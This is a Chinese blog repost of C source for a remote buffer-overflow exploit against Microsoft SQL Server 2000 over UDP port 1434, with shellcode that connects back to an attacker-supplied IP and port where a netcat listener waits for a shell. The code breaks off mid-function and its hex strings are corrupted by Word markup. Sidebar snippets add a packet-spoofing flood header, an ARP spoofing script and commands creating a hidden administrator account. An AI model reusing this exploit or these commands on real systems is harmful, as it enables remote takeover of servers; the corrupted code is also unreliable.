[转贴]去年1月25日全球网络受攻击的源代码

最新推荐文章于 2023-02-12 14:55:14 发布
最新推荐文章于 2023-02-12 14:55:14 发布
阅读量859 收藏
点赞数
文章标签: Office C# C C++ SQL Server

/*<?xml:namespace prefix = o ns = "urn:schemas-microsoft-com:office:office" />

* <?xml:namespace prefix = st1 ns = "urn:schemas-microsoft-com:office:smarttags" /><chsdate w:st="on" isrocdate="False" islunardate="False" day="25" month="1" year="2004"><span style="FONT-SIZE: 9pt; COLOR: green; FONT-FAMILY: 华文宋体; mso-font-kerning: 0pt">一月<span lang="EN">25</span>日</span></chsdate>全球网络受攻击的源代码

* 据说以下代码就是造成全球网络攻击的源代码,有兴趣的可以研究一下。

* 本文仅供研究,违者自负!!

*/

/*

MS SQL2k remote UDP Exploit

by David Litchfield, david@ngssoftware.com

*/

#include

#include

#pragma comment (lib,"Ws2_32")

int GainControlOfSQL(void);

int StartWinsock(void);

struct sockaddr_in c_sa;

struct sockaddr_in s_sa;

struct hostent *he;

SOCKET sock;

unsigned long addr;

int SQLUDPPort=1434;

char host[256]="";

char request[4000]="\x04";

char ping[8]="\x02";

char exploit_code[]=

"\x55\x8B\xEC\x68\x18\x10\xAE\x42\x68\x<chmetcnv w:st="on" tcsc="0" numbertype="1" negative="False" hasspace="False" sourcevalue="1" unitname="C">1C</chmetcnv>"

"\x10\xAE\x42\xEB\x03\x5B\xEB\x05\xE8\xF8"

"\xFF\xFF\xFF\xBE\xFF\xFF\xFF\xFF\x81\xF6"

"\xAE\xFE\xFF\xFF\x03\xDE\x90\x90\x90\x90"

"\x90\x33\xC9\xB1\x44\xB2\x58\x30\x13\x83"

"\xEB\x01\xE2\xF9\x43\x53\x8B\x75\xFC\xFF"

"\x16\x50\x33\xC0\xB0\x<chmetcnv w:st="on" tcsc="0" numbertype="1" negative="False" hasspace="False" sourcevalue="0" unitname="C">0C</chmetcnv>\x03\xD8\x53\xFF"

"\x16\x50\x33\xC0\xB0\x10\x03\xD8\x53\x8B"

"\x45\xF4\x50\x8B\x75\xF8\xFF\x16\x50\x33"

"\xC0\xB0\x<chmetcnv w:st="on" tcsc="0" numbertype="1" negative="False" hasspace="False" sourcevalue="0" unitname="C">0C</chmetcnv>\x03\xD8\x53\x8B\x45\xF4\x50"

"\xFF\x16\x50\x33\xC0\xB0\x08\x03\xD8\x53"

"\x8B\x45\xF0\x50\xFF\x16\x50\x33\xC0\xB0"

"\x10\x03\xD8\x53\x33\xC0\x33\xC9\x66\xB9"

"\x04\x01\x50\xE2\xFD\x89\x45\xDC\x89\x45"

"\xD8\xBF\x<chmetcnv w:st="on" tcsc="0" numbertype="1" negative="False" hasspace="False" sourcevalue="7" unitname="F">7F</chmetcnv>\x01\x01\x01\x89\x7D\xD4\x40"

"\x40\x89\x45\xD0\x66\xB8\xFF\xFF\x66\x35"

"\xFF\xCA\x66\x89\x45\xD2\x<chmetcnv w:st="on" tcsc="0" numbertype="1" negative="False" hasspace="False" sourcevalue="6" unitname="a">6A</chmetcnv>\x01\x<chmetcnv w:st="on" tcsc="0" numbertype="1" negative="False" hasspace="False" sourcevalue="6" unitname="a">6A</chmetcnv>\x02"

"\x8B\x75\xEC\xFF\xD6\x89\x45\xEC\x<chmetcnv w:st="on" tcsc="0" numbertype="1" negative="False" hasspace="False" sourcevalue="6" unitname="a">6A</chmetcnv>\x10"

"\x8D\x75\xD0\x56\x8B\x5D\xEC\x53\x8B\x45"

"\xE8\xFF\xD0\x83\xC0\x44\x89\x85\x58\xFF"

"\xFF\xFF\x83\xC0\x5E\x83\xC0\x5E\x89\x45"

"\x84\x89\x5D\x90\x89\x5D\x94\x89\x5D\x98"

"\x8D\xBD\x48\xFF\xFF\xFF\x57\x8D\xBD\x58"

"\xFF\xFF\xFF\x57\x33\xC0\x50\x50\x50\x83"

"\xC0\x01\x50\x83\xE8\x01\x50\x50\x8B\x5D"

"\xE0\x53\x50\x8B\x45\xE4\xFF\xD0\x33\xC0"

"\x50\xC6\x04\x24\x61\xC6\x44\x24\x01\x64"

"\x68\x54\x68\x72\x65\x68\x45\x78\x69\x74"

"\x54\x8B\x45\xF0\x50\x8B\x45\xF8\xFF\x10"

"\xFF\xD0\x90\x<chmetcnv w:st="on" tcsc="0" numbertype="1" negative="False" hasspace="False" sourcevalue="2" unitname="F">2F</chmetcnv>\x2B\x<chmetcnv w:st="on" tcsc="0" numbertype="1" negative="False" hasspace="False" sourcevalue="6" unitname="a">6A</chmetcnv>\x07\x6B\x<chmetcnv w:st="on" tcsc="0" numbertype="1" negative="False" hasspace="False" sourcevalue="6" unitname="a">6A</chmetcnv>\x76"

"\x<chmetcnv w:st="on" tcsc="0" numbertype="1" negative="False" hasspace="False" sourcevalue="3" unitname="C">3C</chmetcnv>\x34\x34\x58\x58\x33\x3D\x<chmetcnv w:st="on" tcsc="0" numbertype="1" negative="False" hasspace="False" sourcevalue="2" unitname="a">2A</chmetcnv>\x36\x3D"

"\x34\x6B\x<chmetcnv w:st="on" tcsc="0" numbertype="1" negative="False" hasspace="False" sourcevalue="6" unitname="a">6A</chmetcnv>\x76\x<chmetcnv w:st="on" tcsc="0" numbertype="1" negative="False" hasspace="False" sourcevalue="3" unitname="C">3C</chmetcnv>\x34\x34\x58\x58\x58"

"\x58\x<chmetcnv w:st="on" tcsc="0" numbertype="1" negative="False" hasspace="False" sourcevalue="0" unitname="F">0F</chmetcnv>\x0B\x19\x0B\x37\x3B\x33\x3D\x<chmetcnv w:st="on" tcsc="0" numbertype="1" negative="False" hasspace="False" sourcevalue="2" unitname="C">2C</chmetcnv>"

"\x19\x58\x58\x3B\x37\x36\x36\x3D\x3B\x<chmetcnv w:st="on" tcsc="0" numbertype="1" negative="False" hasspace="False" sourcevalue="2" unitname="C">2C</chmetcnv>"

"\x58\x1B\x<chmetcnv w:st="on" tcsc="0" numbertype="1" negative="False" hasspace="False" sourcevalue="2" unitname="a">2A</chmetcnv>\x3D\x39\x<chmetcnv w:st="on" tcsc="0" numbertype="1" negative="False" hasspace="False" sourcevalue="2" unitname="C">2C</chmetcnv>\x3D\x08\x<chmetcnv w:st="on" tcsc="0" numbertype="1" negative="False" hasspace="False" sourcevalue="2" unitname="a">2A</chmetcnv>\x37"

"\x3B\x3D\x2B\x2B\x19\x58\x58\x3B\x35\x<chmetcnv w:st="on" tcsc="0" numbertype="1" negative="False" hasspace="False" sourcevalue="3" unitname="C">3C</chmetcnv>"

"\x58";

int main(int argc, char *argv[])

{

unsigned int ErrorLevel=0,len=0,c =0;

int count = 0;

char sc[300]="";

char ipaddress[40]="";

unsigned short port = 0;

unsigned int ip = 0;

char *ipt="";

char buffer[400]="";

unsigned short prt=0;

char *prtt="";

if(argc != 2 && argc != 5)

{

printf("===============================================================\r\n");

printf("SQL Server UDP Buffer Overflow Remote Exploit\r\n\n");

printf("Modified from \"Advanced Windows Shellcode\"\r\n");

printf("Code by David Litchfield, david@ngssoftware.com\r\n");

printf("Modified by lion, fix a bug.\r\n");

printf("Welcome to HUC Website http://www.cnhonker.com\r\n\n");

printf("Usage:\r\n");

printf(" %s Target [ ]\r\n\n", argv[0]);

printf("Exemple:\r\n");

printf("Target is MSSQL SP 0:\r\n");

printf(" C:\\>nc -l -p 53\r\n");

printf(" C:\\>%s db.target.com 202.202.202.202 53 0\r\n",argv[0]);

printf("Target is MSSQL SP 1 or 2:\r\n");

printf(" c:\\>%s db.target.com 202.202.202.202\r\n\n", argv[0]);

return 0;

}

strncpy(host, argv[1], 100);

if(argc == 5)

{

strncpy(ipaddress, argv[2], 36);

port = atoi(argv[3]);

// SQL Server 2000 Service pack level

// The import entry for GetProcAddress in sqlsort.dll

// is at 0x42ae1010 but on SP 1 and 2 is at 0x42ae<chmetcnv w:st="on" tcsc="0" numbertype="1" negative="False" hasspace="False" sourcevalue="101" unitname="C">101C</chmetcnv>

// Need to set the last byte accordingly

if(argv[4][0] == 0x30)

{

printf("MSSQL SP 0. GetProcAddress @0x42ae1010\r\n");

exploit_code[9]=0x10;

}

else

{

printf("MSSQL SP 1 or 2. GetProcAddress @0x42ae<chmetcnv w:st="on" tcsc="0" numbertype="1" negative="False" hasspace="False" sourcevalue="101" unitname="C">101C</chmetcnv>\r\n");

}

}

ErrorLevel = StartWinsock();

if(ErrorLevel==0)

{

printf("Starting Winsock Error.\r\n");

return 0;

}

if(argc == 2)

{

strcpy(request,ping);

GainControlOfSQL();

return 0;

}

strcpy(buffer,exploit_code);

// set this IP address to connect back to

// this should be your address

ip = inet_addr(ipaddress);

ipt = (char*)&ip;

buffer[142]=ipt[0];

buffer[143]=ipt[1];

buffer[144]=ipt[2];

buffer[145]=ipt[3];

// set the TCP port to connect on

// netcat should be listening on this port

// e.g. nc -l -p 80

prt = htons(port);

prt = prt ^ 0xFFFF;

prtt = (char *) &prt;

buffer[160]=prtt[0];

buffer[161]=prtt[1];

strcat(request,"AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXX");

// Overwrite the saved return address on the stack

// This address contains a jmp esp instruction

// and is in sqlsort.dll.

strcat(request,"\xDC\xC9\xB0\x42"); // 0x42B<chmetcnv w:st="on" tcsc="0" numbertype="1" negative="False" hasspace="False" sourcevalue="0" unitname="C">0C</chmetcnv>9DC

// Need to do a near jump

strcat(request,"\xEB\x0E\x41\x42\x43\x44\x45\x46");

// Need to set an address which is writable or

// sql server will crash before we can exploit

// the overrun. Rather than choosing an address

// on the stack which could be anywhere we'll

// use an address in the .data segment of sqlsort.dll

// as we're already using sqlsort for the saved

// return address

// SQL 2000 no service packs needs the address here

strcat(request,"\x01\x70\xAE\x42");

// SQL 2000 Service Pack 2 needs the address here

strcat(request,"\x01\x70\xAE\x42");

// just a few nops

strcat(request,"\x90\x90\x90\x90\x90\x90\x90\x90");

// tack on exploit code to the end of our request and fire it off

strcat(request,buffer);

GainControlOfSQL();

return 0;

}

int StartWinsock()

{

int err=0;

WORD wVersionRequested;

WSADATA wsaData;

wVersionRequested = MAKEWORD(2,1);

err = WSAStartup( wVersionRequested, &wsaData );

if (err != 0)

{

printf("error WSAStartup 1.\r\n");

return 0;

}

if ( LOBYTE( wsaData.wVersion ) != 2 || HIBYTE( wsaData.wVersion ) != 1 )

{

printf("error WSAStartup 2.\r\n");

WSACleanup( );

return 0;

}

if (isalpha(host[0]))

{

he = gethostbyname(host);

if (he == NULL)

{

printf("Can't get the ip of %s!\r\n", host);

WSACleanup( );

exit(-1);

}

s_sa.sin_addr.s_addr=INADDR_ANY;

s_sa.sin_family=AF_INET;

memcpy(&s_sa.sin_addr,he->h_addr,he->h_length);

}

else

{

s_sa.sin_family=AF_INET;

s_sa.sin_addr.s_addr = inet_addr(host);

}

return 1;

}

int GainControlOfSQL(void)

{

char resp[600]="";

int snd=0,rcv=0,count=0, var=0;

unsigned int ttlbytes=0;

iteye_15968
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
谓词推入的优化案例
24号信仰
08-07 1万+
案例很简单,主要就是长…… Sql文本: select count(*) from VIEW_SB_UUUUUUUUUUUUUUUUU where 1 = 1 and (KKKKID in (SELECT orgno FROM PP_OOO WHERE PARENTORGNO = '110000078...
网络攻击代码
12-30
网络攻击代码#include #include #include #include #define SEQ 0x28376839 #define NUM 7//反射服务器的个数 #define FAKE_IP "192.168.0.6" //伪装IP的起始值,本程序的伪装IP覆盖一个B类网段 #define STATUS_FAILED 0xFFFF //错误返回值 typedef struct _iphdr //定义IP首部 { unsigned char h_verlen; //4位首部长度,4位IP版本号 unsigned char tos; //8位服务类型TOS unsigned short total_len; //16位总长度(字节) unsigned short ident; //16位标识 unsigned short frag_and_flags; //3位标志位 unsigned char ttl; //8位生存时间 TTL unsigned char proto; //8位协议 (TCP, UDP 或其他) unsigned short checksum; //16位IP首部校验和 unsigned int sourceIP; //32位源IP地址 unsigned int destIP; //32位目的IP地址 }IP_HEADER;
黑客攻击全球网络代码被指源于美国国家安全局
weixin_34233856的博客
07-04 635
据新加坡“联合早报网”报道,12全球范围多个国家遭到大规模网络攻击,被攻击者被要求支付比特币解锁。 研究人普遍相信,这次大规模网络攻击采用了美国国家安全局(NSA)开发的黑客工具。几个私立网络安全公司的研究人员表示,黑客通过利用名为“Eternal Blue”的NSA代码,导致软件能够自我传播。 12,一种锁死电脑的恶意软件正在世界各地迅速传播,据...
python网络攻击代码_Python-python网络编程写arp攻击代码
weixin_39771987的博客
11-24 623
from scapy.all import ARP,send,arpingimport sys,re,random,timestdout=sys.stdoutipIPADDR="192.168.1.102"网关gateway_ip="192.168.1.1"tmp=[]伪造网关mac地址for i in range(0,6):tmp.append(str("%02x"%random.randint...
常见的网络攻击及解决方案(附源码)
麻瓜哇哇哇的博客
05-04 5481
简介 作为前端攻城狮,web安全是每个开发人员必须了解的,这也是面试经常会被问到的问题,本文我就将我所了解的常见攻击方式以及预防,和大家做个分享,如有不对的地方,欢迎大神指导。 首先,浏览器的同源策略(这个我在之前跨域的文章中有讲,有不明白的朋友可以先看下那篇文章)是浏览器安全的基础,许多客户端脚本攻击,都需要遵顼这一法则,因此理解同源策略对于客户端攻击有着重要意义,一旦同源策源出现漏洞被绕过,将...
1591272283814_网络攻击_网络节点_
10-03
实现网络节点攻击,实现图最大连通分量下降基础上,找到删除点的最小代价。
网络渗透技术源码,不错的好资源
04-27
网络渗透技术源码,带大家领略网络技术核心,是学习网络攻防很好的资源!还没有的赶紧下载,所需积分很少。
网络入侵检测源代码
02-28
关于网络入侵检测的毕业设计,包含抓包,解析,报警等功能
攻防世界php_rce
Frog_123的博客
06-09 477
#小青蛙一枚,仅做学习记录 题目 ThinkPHP V5的相关漏洞,可以去github上搜索相关远程执行漏洞。 实操 打开github,搜索相关ThinnkPHP的漏洞,查看第一条。 根据题目的提示,选取5.0版本的漏洞进行实验。假如我们选取了 http://127.0.0.1/tp5/public/?s=index/\think\View/display&content=%22%3C?%3E%3C?php%20phpinfo();?%3E&data=1 会有一个报错提示,提示我们选取5
火遍全球的ChatGPT技术简介与主干网络代码
02-12 8438
如果说当下最火的AI技术和话题是什么,恐怕很难绕开ChatGPT。各大厂商都在表示未来要跟进ChatGPT技术,开发在自然语言处理智能系统,可见其影响力。本篇博客追个热度,来简单的介绍下ChatGPT到底是一项什么技术,究竟如何完成复杂的语言处理任务的。
xxxxxxxxxxxxxxxxxxxxxxxxxxxx
热门推荐
weixin_34273481的博客
04-05 69万+
Get Authorization code:Request: https://accounts.google.com/o/oauth2/v2/auth?redirect_uri=https%3A%2F%2Fdevelopers.google.com%2Foauthplayground&prompt=consent&response_type=code&client_id=...
环境搭建 Day02
矛盾完善着的博客
12-31 2443
编译型 一次性将所有代码翻译成机器语言 解释型 边运行边翻译 搭建IDEA环境 创建一个空的Java文件项目[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-BfNjLwq5-1640920732045)(C:\Users\Administrator\AppData\Roaming\Typora\typora-user-images\image-20211201100748483.png)] 新建一个模块 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接
安全测试===黑客攻击常用cmd命令大全
weixin_33736832的博客
08-11 5075
黑客常用命令大全net user heibai lovechina /add 加一个heibai的用户密码为lovechina net localgroup Administrators heibai /add 把他加入Administrator组net start telnet 开对方的TELNET服务net use z:\127.0...
像电影里的黑客高手一样敲代码攻击入侵网站!装逼神器 !
烟敛寒林的博客
04-26 1万+
我们常常会在一些好莱坞电影大片里看到超级黑客高手,在电脑前轻松“黑”进别人的安全系统的场景。那纯熟自如地输入一大堆复杂的代码,不一下子就入侵/破解完成,是不是很羡慕? 其实咱们也可以像电影、游戏里面的黑客一样敲代码,今天就介绍一个传说中的装逼神器 HackerTyper 给你吧!它是一个专门为装 B 而制作的神奇好玩的网页,打开之后只要随便按键盘,你就可以屌到爆地写代...
九大全球网络攻击实时追踪系统盘点
xysoul的专栏
01-22 3万+
关注网络安全的小伙伴们每天都在关注着世界上每时每刻都在发生的网络攻击事件。也许你很难想象全球范围内所有攻击活动进行时的壮观场景,也很难了解网络攻击攻击背后的组织是怎样的……那么本文将带你一览无余。 科普:攻击数据从何而来? 这是一些很形象、生动、有趣的攻击可视化记录。所有在地图上展示的大数据都是来自真实的生活目标、“蜜罐”和安全公司部署的“诱饵系统”收集的数据,其中有攻击来源、攻击
“陷阱”病毒源代码大揭密
thexiao的专栏
07-21 2265
   7初在我国出现了一种名叫“陷阱”(Trap)的新型恶性病毒,并在75全面爆发,目前国内已有不少的网站和用户遭“陷阱”的袭击,造成网络系统瘫痪、文件丟失现象严重。该病毒是一种网络脚本语言病毒,并是同时使用了VBScript 和 JavaScript 两种脚本语言编写的,通过OutLook电子邮件传播(不打开邮件也能被感染)、感染文件传播,传播能力较强,并能直接攻击Microsoft I
xxxxxxx
weixin_30245867的博客
12-02 1万+
xxxxxxxxxxxxxxxx 转载于:https://www.cnblogs.com/pythonClub/p/10054454.html
代码装逼大全
李绮梦的专栏
11-04 16万+
对于循环 for(int i=0;i 改成 for(int i=0,e=list.size();i for里可以用赋值表达式。
selenium之chrome driver版本选择
Judy18的博客
05-06 4327
1.Chrome driver版本选择 (1)查看chrome浏览器版本 点击Chrome浏览器右上角的三个小点——>点击【帮助】——>点击【关于 Google Chrome(G)】 或者输入chrome://version (2)ChromeDriver与Chrome版本对应参照表 ChromeDriver Version Chrome Version 99.xxxxxxx 99 98.xxxxxxxx 98 97.xxxxxxxx 9
if "贴现模板" or '转贴买断' in file:
最新发布
05-31
这段代码看起来是在判断一个字符串中是否包含特定的子字符串。但是它的实际效果可能和你期望的不太一样。 在 Python 中,可以使用 `in` 关键字来判断一个字符串是否包含另一个字符串。但是需要注意的是,这个判断是...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值